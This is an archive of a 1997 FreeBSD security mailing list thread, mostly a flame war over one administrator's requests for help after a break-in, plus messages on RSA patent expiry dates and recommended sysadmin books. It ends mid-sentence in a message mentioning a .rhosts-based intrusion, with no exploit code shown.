Jul 1997 07:54:58 -0700 (PDT) Date: Wed, 30 Jul 1997 07:54:58 -0700 (PDT) From: Vincent Poy To: Nate Williams cc: Marco Molteni , security@freebsd.org, "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <199707301449.IAA04613@rocky.mt.sri.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Nate Williams wrote: =)> There's a thing really I can't understand in all this thread. =)> Nobody said: =)> "Vince, we're sorry about what happened to you. Probably you did something =)> stupid, but _everybody_ has to learn his lesson the hard way. =)> Here you are a a checklist of books, programs and ideas to follow to =)> improve the security of your site." =)> =)> No, everybody started to flame at him! Why? Because he choosed as his =)> subject line: "security hole in FreeBSD" instead of "I'm a sucker =)> please you security wizards help me" ? =) =) =)Ahh, but you assume that we haven't ever seen Vinny before. =)Unfortunately, his behavior is 'typical', in that he wants us to do all =)his research and work for him, rather than him spending the time to do =)his own work. He also shows a complete lack of interest in finding out =)solutions to his own problems. I have tried reading the docs and it sometimes fails so what would you do? =)I've dealt with him too many times over the last 2 years to have =)anything but pity on any company he works for, since he will require =)hand-holding and doesn't do anything on his own. Since when have you dealt with me too many times over the last 2 years, you have helped me exactly twice. What works for you will not necessarily work for everyone. Everytime all you would do is start flaming. Most of the people here have more resources than I would which is $$$ since remember I don't get paid to do this sysadmin stuff and even for the router, you are there physically, I am not so I need to verify things before doing it as a precaution. I don't think you or anyone else here never asked for help from others before. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Wed Jul 30 08:03:52 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA06731 for security-outgoing; Wed, 30 Jul 1997 08:03:52 -0700 (PDT) Received: from altos.rnd.runnet.ru (altos.rnd.runnet.ru [195.208.248.40]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA06694 for ; Wed, 30 Jul 1997 08:03:23 -0700 (PDT) Received: from altos.rnd.runnet.ru (altos.rnd.runnet.ru [195.208.248.40]) by altos.rnd.runnet.ru (8.8.5/8.7.3) with SMTP id TAA16608; Wed, 30 Jul 1997 19:03:58 +0400 (MSD) Date: Wed, 30 Jul 1997 19:03:58 +0400 (MSD) From: Maxim Bolotin To: dkelly@HiWAAY.net cc: freebsd-security@FreeBSD.ORG Subject: Re: Commercial ssh and ssl (was Re: securelevel...) In-Reply-To: <199707300301.WAA09906@nexgen.hiwaay.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Vincent Poy wrote: > I forgot, when does the relavent RSA patent expire? Maybe we can wait until > then. :-) "Practical UNIX and Internet Security", second edition, April 1996. p.563 This restriction is result of the fact that the use of public-key cryptography in the United States will be covered by patents until the year 1997 (in the case of the Diffie-Hallman and Hallman-Merkle patents) or the year 2000(in the case of the RSA patent). p.159 The RSA algorithm is covered by U.S. Patent 4,405,829 ("Cryptographic Communications System and Method"), which was filed for on December 14, 1977; issued on September 20, 1983; and expires on September 20, 2000. Because a description of the algorithm was published before the patent application was filed, RSA can be used without royalty everywhere in the world except the United States (international patent laws have different coverage of prior disclosure and patent applicability). p.192 Table 6-4. The Public Key Cryptography Patents. Patent # Title Covers Invention Date expires 4200770 Cryp. Apparatus and Meth. Diffie-Hellman April 29, 1997 Key exchange 4218582 Public Key Cryp. Knapsack, and August 19, 1997 Apparatus and Method possibly all of public key crypt. 4424414 Exponentiation crypt. and January 3, 2001 Apparatus and Method 4405829 Crypt. communications RSA encryption September 20, 2000 System and Method Maxim. - Rostov State University Computer Center Rostov-on-Don, +7 (8632) 285794 or 357476 Russia, RUNNet, MAB1-RIPE max@runnet.ru From owner-freebsd-security Wed Jul 30 08:07:12 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA07052 for security-outgoing; Wed, 30 Jul 1997 08:07:12 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA07042 for ; Wed, 30 Jul 1997 08:07:07 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id JAA04746; Wed, 30 Jul 1997 09:06:41 -0600 (MDT) Date: Wed, 30 Jul 1997 09:06:41 -0600 (MDT) Message-Id: <199707301506.JAA04746@rocky.mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Vincent Poy Cc: Nate Williams , Marco Molteni , security@freebsd.org, "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: References: <199707301449.IAA04613@rocky.mt.sri.com> X-Mailer: VM 6.29 under 19.15 XEmacs Lucid Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > =)Ahh, but you assume that we haven't ever seen Vinny before. > =)Unfortunately, his behavior is 'typical', in that he wants us to do all > =)his research and work for him, rather than him spending the time to do > =)his own work. He also shows a complete lack of interest in finding out > =)solutions to his own problems. > > I have tried reading the docs and it sometimes fails so what would > you do? What docs have you read? What books have you read? > Since when have you dealt with me too many times over the last 2 > years, you have helped me exactly twice. Do you want me to drag out my archives and prove you wrong? > flaming. Most of the people here have more resources than I would which > is $$$ since remember I don't get paid to do this sysadmin stuff *SO WHAT*. Do you think I get paid to answer you? Do you think I've ever got paid to do any FreeBSD hacking? It's irrelevant. I'm not the person who claims he can read a 500 works/minutes, and who needs no sleep at night, and who also 'must have missed all 12 emails discussing the same problem in the mailing lists, even though I do read the lists'. You don't learn from anything *but* your own mistakes, and then don't try to come up with solutions, but rely on someone else to provide them for you. > and even > for the router, you are there physically, I am not so I need to verify > things before doing it as a precaution. I don't think you or anyone else > here never asked for help from others before. That's because I and most of the other folks do their research *first*, and then ask questions. You continue to whine and complain and show a complaint lack of interest in figuring out the solution, and would rather have someone spoon-feed you the steps in an easy to do solution Unfortunately, there ain't 'system administration for dummies', because because a sys-ad requires a broad-base of knowledge, and you with all your supposed talents don't take the time to do a good job. One thing that my family has taught me is that you end up with better jobs by going out of your way to do your current job well. By sitting on your duff and relying on people to tell you what to do, you'll never get ahead in life. I only wish you could understand this advice, and actually apply it. Nate From owner-freebsd-security Wed Jul 30 08:13:52 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA07496 for security-outgoing; Wed, 30 Jul 1997 08:13:52 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA07491 for ; Wed, 30 Jul 1997 08:13:50 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id JAA04836; Wed, 30 Jul 1997 09:13:42 -0600 (MDT) Date: Wed, 30 Jul 1997 09:13:42 -0600 (MDT) Message-Id: <199707301513.JAA04836@rocky.mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Vincent Poy Cc: Marco Molteni , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: References: X-Mailer: VM 6.29 under 19.15 XEmacs Lucid Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > I know. I mean Nate and Jordan has been in this thing for atleast > twice as long as I have. I'm only 23 years old now. When I turned 23, I had been minix hacking for 2-3 years. How old do you think Chris Demetriou (of NetBSD fame) is? You've got lots of excuses, but no answers. Nate From owner-freebsd-security Wed Jul 30 08:29:04 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA08626 for security-outgoing; Wed, 30 Jul 1997 08:29:04 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA08617 for ; Wed, 30 Jul 1997 08:29:00 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id IAA14176; Wed, 30 Jul 1997 08:28:48 -0700 (PDT) Date: Wed, 30 Jul 1997 08:28:47 -0700 (PDT) From: Vincent Poy To: Nate Williams cc: Marco Molteni , security@freebsd.org, "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <199707301506.JAA04746@rocky.mt.sri.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Nate Williams wrote: =)> =)Ahh, but you assume that we haven't ever seen Vinny before. =)> =)Unfortunately, his behavior is 'typical', in that he wants us to do all =)> =)his research and work for him, rather than him spending the time to do =)> =)his own work. He also shows a complete lack of interest in finding out =)> =)solutions to his own problems. =)> =)> I have tried reading the docs and it sometimes fails so what would =)> you do? =) =)What docs have you read? What books have you read? The docs that came with the product. As for books, I don't have that much time to go through reading books because by the time I finish reading it, it'll be too late. =)> Since when have you dealt with me too many times over the last 2 =)> years, you have helped me exactly twice. =) =)Do you want me to drag out my archives and prove you wrong? =) =)> flaming. Most of the people here have more resources than I would which =)> is $$$ since remember I don't get paid to do this sysadmin stuff =) =)*SO WHAT*. Do you think I get paid to answer you? Do you think I've =)ever got paid to do any FreeBSD hacking? It's irrelevant. I'm not the =)person who claims he can read a 500 works/minutes, and who needs no =)sleep at night, and who also 'must have missed all 12 emails discussing =)the same problem in the mailing lists, even though I do read the lists'. I know you don't get paid to answer me but no one pointed a gun to your head and made you answer every question I ask. I never claimed I can read 500 words a minute. I did say I need no sleep at night but do remember, I am still in school so FreeBSD isn't my only thing. And it wouldn't be weird if I missed a whole thread since sometimes when the owners are on vacation, the bbs machine which I have no control of crashes and the mail backlogs on the machine I read the mailing list on crashes too and not until 10 days later, will the machines be back back up. And when I resubscribe again which I did atleast 10-20 times just this year alone, I would miss out on parts of the discussion. =)You don't learn from anything *but* your own mistakes, and then don't =)try to come up with solutions, but rely on someone else to provide them =)for you. I know I wouldn't learn from anything but my own mistakes since if certain things are not in the docs, I would need to ask. =)> and even =)> for the router, you are there physically, I am not so I need to verify =)> things before doing it as a precaution. I don't think you or anyone else =)> here never asked for help from others before. =) =)That's because I and most of the other folks do their research *first*, =)and then ask questions. You continue to whine and complain and show a =)complaint lack of interest in figuring out the solution, and would =)rather have someone spoon-feed you the steps in an easy to do solution You're still forgetting the fact that when you are physically there next to the router machine, it's a night and day difference in figuring things out. But when it's like totally remote, then you do need to verify things first instead of totally screwing it up. Besides, for the serial card, I asked if I had the configuration settings correct and you did post a configuration of yours which worked but when we tried it didn't. And this problem was never covered in the docs. Somehow for whatever reason, the FreeBSD machine would not see the CSU/DSU unless either it was power toggled on/off or we had to issue a few linkup commands in the script. Sorry about that one since I wasn't physically there so I thought it might have been my misconfiguration. =)Unfortunately, there ain't 'system administration for dummies', because =)because a sys-ad requires a broad-base of knowledge, and you with all =)your supposed talents don't take the time to do a good job. I'm trying to do my best at it but the problem is there is only so many hours per day and I can't just drop the entire project and go read books and stuff when the book might not even cover it. =)One thing that my family has taught me is that you end up with better =)jobs by going out of your way to do your current job well. By sitting =)on your duff and relying on people to tell you what to do, you'll never =)get ahead in life. I only wish you could understand this advice, and =)actually apply it. I'll try but with this security incident, it's different because all three of us went into panic since if we had access to the machine now, we would be able to atleast find things. I guess what I need to do is find the time to start reading things but I don't know where to start since things in the computer area become obselete so fast these days anyways. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Wed Jul 30 08:34:12 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA09005 for security-outgoing; Wed, 30 Jul 1997 08:34:12 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA08993 for ; Wed, 30 Jul 1997 08:34:04 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id IAA14193; Wed, 30 Jul 1997 08:33:53 -0700 (PDT) Date: Wed, 30 Jul 1997 08:33:52 -0700 (PDT) From: Vincent Poy To: Nate Williams cc: Marco Molteni , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <199707301513.JAA04836@rocky.mt.sri.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Nate Williams wrote: =)> I know. I mean Nate and Jordan has been in this thing for atleast =)> twice as long as I have. I'm only 23 years old now. =) =)When I turned 23, I had been minix hacking for 2-3 years. How old do =)you think Chris Demetriou (of NetBSD fame) is? You've got lots of =)excuses, but no answers. When you were 23 and when Chris were 23, you guys were in the field of hacking and stuff. I was one who learned my way around computers without taking any classes or anything. It's just these 2 years, everything seemed to need more priority than it used to because hackers are a greater risk now than they are before among other things. I am in the field of AstroPhysics and haven't learned Unix from anyone but just myself. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Wed Jul 30 09:09:51 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA11737 for security-outgoing; Wed, 30 Jul 1997 09:09:51 -0700 (PDT) Received: from nak.myhouse.com (nak.myhouse.com [209.70.45.162]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id JAA11728 for ; Wed, 30 Jul 1997 09:09:47 -0700 (PDT) Received: (qmail 4362 invoked by uid 1000); 30 Jul 1997 16:09:34 -0000 Date: Wed, 30 Jul 1997 12:09:34 -0400 (EDT) From: zoonie To: Vincent Poy cc: Nate Williams , Marco Molteni , security@FreeBSD.ORG, "\[Mario1-\]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk can all of you take this off-line, it's obvious that vincent needs to do some homework. if we think that his questions are newbee questions then we should just tell him to RTFM and then ignore him or we should just answer them off this list. if he doesn't get paid to do sysadmin stuff for gaianet and doesn't have the time to read books on this stuff that's his problem and i really don't want to know about it. enough is enough.... On Wed, 30 Jul 1997, Vincent Poy wrote: > On Wed, 30 Jul 1997, Nate Williams wrote: > > =)> =)Ahh, but you assume that we haven't ever seen Vinny before. > =)> =)Unfortunately, his behavior is 'typical', in that he wants us to do all > =)> =)his research and work for him, rather than him spending the time to do > =)> =)his own work. He also shows a complete lack of interest in finding out > =)> =)solutions to his own problems. > =)> > =)> I have tried reading the docs and it sometimes fails so what would > =)> you do? > =) > =)What docs have you read? What books have you read? > > The docs that came with the product. As for books, I don't have > that much time to go through reading books because by the time I finish > reading it, it'll be too late. > > =)> Since when have you dealt with me too many times over the last 2 > =)> years, you have helped me exactly twice. > =) > =)Do you want me to drag out my archives and prove you wrong? > =) > =)> flaming. Most of the people here have more resources than I would which > =)> is $$$ since remember I don't get paid to do this sysadmin stuff > =) > =)*SO WHAT*. Do you think I get paid to answer you? Do you think I've > =)ever got paid to do any FreeBSD hacking? It's irrelevant. I'm not the > =)person who claims he can read a 500 works/minutes, and who needs no > =)sleep at night, and who also 'must have missed all 12 emails discussing > =)the same problem in the mailing lists, even though I do read the lists'. > > I know you don't get paid to answer me but no one pointed a gun to > your head and made you answer every question I ask. I never claimed I can > read 500 words a minute. I did say I need no sleep at night but do > remember, I am still in school so FreeBSD isn't my only thing. And it > wouldn't be weird if I missed a whole thread since sometimes when the > owners are on vacation, the bbs machine which I have no control of crashes > and the mail backlogs on the machine I read the mailing list on crashes > too and not until 10 days later, will the machines be back back up. And > when I resubscribe again which I did atleast 10-20 times just this year > alone, I would miss out on parts of the discussion. > > =)You don't learn from anything *but* your own mistakes, and then don't > =)try to come up with solutions, but rely on someone else to provide them > =)for you. > > I know I wouldn't learn from anything but my own mistakes since if > certain things are not in the docs, I would need to ask. > > =)> and even > =)> for the router, you are there physically, I am not so I need to verify > =)> things before doing it as a precaution. I don't think you or anyone else > =)> here never asked for help from others before. > =) > =)That's because I and most of the other folks do their research *first*, > =)and then ask questions. You continue to whine and complain and show a > =)complaint lack of interest in figuring out the solution, and would > =)rather have someone spoon-feed you the steps in an easy to do solution > > You're still forgetting the fact that when you are physically > there next to the router machine, it's a night and day difference in > figuring things out. But when it's like totally remote, then you do need > to verify things first instead of totally screwing it up. Besides, for > the serial card, I asked if I had the configuration settings correct and > you did post a configuration of yours which worked but when we tried it > didn't. And this problem was never covered in the docs. Somehow for > whatever reason, the FreeBSD machine would not see the CSU/DSU unless > either it was power toggled on/off or we had to issue a few linkup > commands in the script. Sorry about that one since I wasn't physically > there so I thought it might have been my misconfiguration. > > =)Unfortunately, there ain't 'system administration for dummies', because > =)because a sys-ad requires a broad-base of knowledge, and you with all > =)your supposed talents don't take the time to do a good job. > > I'm trying to do my best at it but the problem is there is only so > many hours per day and I can't just drop the entire project and go read > books and stuff when the book might not even cover it. > > =)One thing that my family has taught me is that you end up with better > =)jobs by going out of your way to do your current job well. By sitting > =)on your duff and relying on people to tell you what to do, you'll never > =)get ahead in life. I only wish you could understand this advice, and > =)actually apply it. > > I'll try but with this security incident, it's different because > all three of us went into panic since if we had access to the machine now, > we would be able to atleast find things. I guess what I need to do is > find the time to start reading things but I don't know where to start > since things in the computer area become obselete so fast these days > anyways. > > > Cheers, > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ > Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] > GaiaNet Corporation - M & C Estate / / / / | / | __] ] > Beverly Hills, California USA 90210 / / / / / |/ / | __] ] > HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] > > > From owner-freebsd-security Wed Jul 30 09:28:18 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA12792 for security-outgoing; Wed, 30 Jul 1997 09:28:18 -0700 (PDT) Received: from critter.dk.tfs.com (critter.phk.freebsd.dk [195.8.133.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA12787 for ; Wed, 30 Jul 1997 09:28:13 -0700 (PDT) Received: from critter.dk.tfs.com (localhost [127.0.0.1]) by critter.dk.tfs.com (8.8.6/8.8.5) with ESMTP id SAA02214; Wed, 30 Jul 1997 18:26:08 +0200 (CEST) To: Nate Williams cc: Marco Molteni , Vincent Poy , security@freebsd.org, "\[Mario1-\]" From: Poul-Henning Kamp Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Wed, 30 Jul 1997 08:49:12 MDT." <199707301449.IAA04613@rocky.mt.sri.com> Date: Wed, 30 Jul 1997 18:26:07 +0200 Message-ID: <2212.870279967@critter.dk.tfs.com> Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >Ahh, but you assume that we haven't ever seen Vinny before. >Unfortunately, his behavior is 'typical', in that he wants us to do all >his research and work for him, rather than him spending the time to do >his own work. He also shows a complete lack of interest in finding out >solutions to his own problems. > >I've dealt with him too many times over the last 2 years to have >anything but pity on any company he works for, since he will require >hand-holding and doesn't do anything on his own. > > >Nate We have a name for that here in Denmark, we call such people "Wheel-barrow-people". You can use them to do the grunt work, but you have to have a tight grip in them with both your hands. If you leave them for however long or short a moment, they'll be the same place you left them when you come back. -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@tfs.com TRW Financial Systems, Inc. Power and ignorance is a disgusting cocktail. From owner-freebsd-security Wed Jul 30 09:33:56 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA13280 for security-outgoing; Wed, 30 Jul 1997 09:33:56 -0700 (PDT) Received: from critter.dk.tfs.com (critter.phk.freebsd.dk [195.8.133.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA13256 for ; Wed, 30 Jul 1997 09:33:51 -0700 (PDT) Received: from critter.dk.tfs.com (localhost [127.0.0.1]) by critter.dk.tfs.com (8.8.6/8.8.5) with ESMTP id SAA02279; Wed, 30 Jul 1997 18:32:01 +0200 (CEST) To: Vincent Poy cc: Nate Williams , Marco Molteni , security@freebsd.org, "[Mario1-]" , JbHunt From: Poul-Henning Kamp Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Wed, 30 Jul 1997 08:33:52 PDT." Date: Wed, 30 Jul 1997 18:32:01 +0200 Message-ID: <2277.870280321@critter.dk.tfs.com> Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message , Vincent Poy writes: >On Wed, 30 Jul 1997, Nate Williams wrote: > >=)> I know. I mean Nate and Jordan has been in this thing for atleast >=)> twice as long as I have. I'm only 23 years old now. >=) >=)When I turned 23, I had been minix hacking for 2-3 years. How old do >=)you think Chris Demetriou (of NetBSD fame) is? You've got lots of >=)excuses, but no answers. > > When you were 23 and when Chris were 23, you guys were in the >field of hacking and stuff. I was one who learned my way around computers >without taking any classes or anything. It's just these 2 years, >everything seemed to need more priority than it used to because hackers >are a greater risk now than they are before among other things. I am in >the field of AstroPhysics and haven't learned Unix from anyone but just >myself. I'm not even going to tell you what I did when I was 23, and the fact that all I had was a high-school exam is merely incidental. People seem to take the path of least resistance, and for some of us that is "finding out" and for others like Vince that seems to be "Whine and somebody will help you". -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@tfs.com TRW Financial Systems, Inc. Power and ignorance is a disgusting cocktail. From owner-freebsd-security Wed Jul 30 09:49:44 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA14655 for security-outgoing; Wed, 30 Jul 1997 09:49:44 -0700 (PDT) Received: from ns1.netcorps.com (ns1.netcorps.com [207.1.125.101]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA14644 for ; Wed, 30 Jul 1997 09:49:39 -0700 (PDT) Received: from localhost (satya@localhost) by ns1.netcorps.com (8.8.5/8.8.5) with SMTP id JAA16566; Wed, 30 Jul 1997 09:45:04 -0700 (PDT) X-Authentication-Warning: ns1.netcorps.com: satya owned process doing -bs Date: Wed, 30 Jul 1997 09:45:04 -0700 (PDT) From: Satya Palani X-Sender: satya@ns1.netcorps.com Reply-To: Satya Palani To: Shashi Joshi cc: Marco Molteni , vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: <199707301450.JAA25877@shift-f1.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Shashi Joshi wrote: > Exactly my thoughts. So, do we get a checklist or reference list from the > gurus? > My point? Having a document or a checklist would be real helpful to newbies > and can serve as a quick reference for the gurus. All new systems administrators should be forced to read the following two books: "Practical Unix & Internet Security" and "Essential System Administration." Both are published by O'Reilly & Associates (www.ora.com). After this, you should be able to make a checklist that is appropriate for your environment. -Satya From owner-freebsd-security Wed Jul 30 10:13:51 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA16631 for security-outgoing; Wed, 30 Jul 1997 10:13:51 -0700 (PDT) Received: from milehigh.denver.net (milehigh.denver.net [204.144.180.2]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA16619 for ; Wed, 30 Jul 1997 10:13:44 -0700 (PDT) Received: (from jdc@localhost) by milehigh.denver.net (8.8.5/8.8.5) id LAA16731; Wed, 30 Jul 1997 11:18:17 -0600 (MDT) Message-ID: <19970730111817.40362@denver.net> Date: Wed, 30 Jul 1997 11:18:17 -0600 From: John-David Childs To: security@FreeBSD.ORG Subject: Re: die thread die! References: <199707301513.JAA04836@rocky.mt.sri.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.74 In-Reply-To: <199707301513.JAA04836@rocky.mt.sri.com>; from Nate Williams on Wed, Jul 30, 1997 at 09:13:42AM -0600 Organization: Enterprise Internet Solutions Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Thus wrote Nate Williams on Jul 30: > > I know. I mean Nate and Jordan has been in this thing for atleast > > twice as long as I have. I'm only 23 years old now. > > When I turned 23, I had been minix hacking for 2-3 years. How old do > you think Chris Demetriou (of NetBSD fame) is? You've got lots of > excuses, but no answers. > We've all agreed that the security hole in FreeBSD thread wasn't really a hole in FreeBSD as much as limitations imposed by knowledge and resources and the thread should have died long ago. However, personal attacks have even less merit on the security list (or any public list). -- John-David Childs (JC612) Enterprise Internet Solutions System Administrator @denver.net/Internet-Coach/@ronan.net & Network Engineer 901 E 17th Ave, Denver 80218 As of this^H^H^H^H next week, passwords will be entered in Morse code. From owner-freebsd-security Wed Jul 30 10:37:45 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA18951 for security-outgoing; Wed, 30 Jul 1997 10:37:45 -0700 (PDT) Received: from ns2.gamespot.com (ns2.gamespot.com [206.169.18.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA18939 for ; Wed, 30 Jul 1997 10:37:42 -0700 (PDT) Received: from localhost (ian@localhost) by ns2.gamespot.com (8.8.5/8.8.5) with SMTP id KAA12321 for ; Wed, 30 Jul 1997 10:37:36 -0700 (PDT) Date: Wed, 30 Jul 1997 10:37:36 -0700 (PDT) From: Ian Kallen To: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <2277.870280321@critter.dk.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk This thread needs to go away now. Cease stating the obvious and/or expressing self-pity. If it's not pertinent to FreeBSD security specifically, take it elsewhere. -- Ian Kallen ian@gamespot.com Director of Technology and Web Administration SpotMedia Communications http://www.gamespot.com/ http://www.videogamespot.com/ From owner-freebsd-security Wed Jul 30 10:54:30 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA20041 for security-outgoing; Wed, 30 Jul 1997 10:54:30 -0700 (PDT) Received: from mtvernon1.accessus.net (johnnyu@mtvernon1.accessus.net [204.248.93.5]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA20036 for ; Wed, 30 Jul 1997 10:54:28 -0700 (PDT) Received: from localhost (johnnyu@localhost) by mtvernon1.accessus.net (8.8.5/8.7.3) with SMTP id MAA21325 for ; Wed, 30 Jul 1997 12:55:41 -0500 Date: Wed, 30 Jul 1997 12:55:40 -0500 (CDT) From: NoHackMe! To: security@freebsd.org Subject: subscribe Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk subscribe From owner-freebsd-security Wed Jul 30 11:39:53 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA23382 for security-outgoing; Wed, 30 Jul 1997 11:39:53 -0700 (PDT) Received: from bizet.videotron.net (bizet.videotron.net [205.151.222.75]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA23376 for ; Wed, 30 Jul 1997 11:39:50 -0700 (PDT) Received: from gvl-07851 (poste221.vl.videotron.net [206.231.222.221]) by bizet.videotron.net (8.8.5/8.8.2) with SMTP id OAA09501 for ; Wed, 30 Jul 1997 14:39:10 -0400 (EDT) Message-Id: <3.0.2.32.19970730144402.006c5dd4@pop.videotron.ca> X-Sender: gilbertp@pop.videotron.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.2 (32) Date: Wed, 30 Jul 1997 14:44:02 -0400 To: security@FreeBSD.ORG From: Patrick Gilbert Subject: Re: security hole in FreeBSD In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk At 17:27 97-07-28 -0700, you wrote: > Just a update on how the break-in was done after the hacker was >confronted on irc. > > Apparently FreeBSD ships with .rhosts in the root account. Using >this and perl5.00401, the user was able to rlogin onto the other machine >without using a password. After a brief discussion with TheCa on Efnet, he dcc'd me his famous exploit for a 